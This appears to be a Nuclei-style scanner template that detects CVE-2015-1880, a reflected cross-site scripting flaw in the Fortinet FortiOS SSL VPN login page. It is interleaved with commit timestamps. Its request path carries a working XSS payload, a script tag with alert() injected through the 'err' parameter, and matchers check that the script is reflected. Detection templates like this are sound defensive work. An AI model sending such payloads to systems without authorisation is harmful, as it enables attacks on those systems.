2021-04-15 08:28:35 +00:00
id : CVE-2015-1880
info :
name : XSS in Fortigates SSL VPN login page
author : pikpikcu
severity : medium
description : Cross-site scripting (XSS) vulnerability in the sslvpn login page in Fortinet FortiOS 5.2.x before 5.2.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
2021-08-18 11:37:49 +00:00
reference :
2021-04-15 08:28:35 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2015-1880
- https://www.c2.lol/articles/xss-in-fortigates-ssl-vpn-login-page
2021-04-17 14:10:44 +00:00
tags : cve,cve2015,xss,fortigates,ssl
2021-04-15 08:28:35 +00:00
requests :
- method : GET
path :
2021-04-17 14:10:44 +00:00
- "{{BaseURL}}/remote/login?&err=--%3E%3Cscript%3Ealert('{{randstr}}')%3C/script%3E%3C!--&lang=en"
2021-04-15 08:28:35 +00:00
matchers-condition : and
matchers :
- type : word
words :
2021-04-17 14:10:44 +00:00
- "<script>alert('{{randstr}}')</script>"
2021-04-15 08:28:35 +00:00
part : body
- type : status
status :
- 200
2021-04-17 14:10:44 +00:00
- type : word
words :
- "text/html"
part : header